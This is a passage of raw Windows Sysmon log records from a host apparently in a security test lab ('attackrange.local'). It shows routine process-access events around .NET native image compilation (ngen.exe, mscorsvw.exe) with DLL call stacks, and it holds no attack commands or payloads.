13:50:02.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8203-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.541{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8203-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.525{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8203-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8103-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.416{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8103-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.416{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8103-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.322{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8003-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.307{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8003-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.307{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8003-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.229{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-7F03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.197{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-7F03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.197{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-7F03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:02.104{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\127c-0\Microsoft.Internal.Tasks.Dataflow.dll2021-01-18 13:50:02.104 10341000x80000000000000007869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:03.978{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920B-6005-8B03-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.978{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920B-6005-8B03-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
10341000x80000000000000007867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.244{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920B-6005-8A03-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.228{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920B-6005-8A03-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:03.228{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920B-6005-8A03-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:03.166{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920B-6005-8903-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.150{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920B-6005-8903-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:03.150{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920B-6005-8903-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:04.588{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920C-6005-8E03-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.572{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920C-6005-8E03-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:04.572{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920C-6005-8E03-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.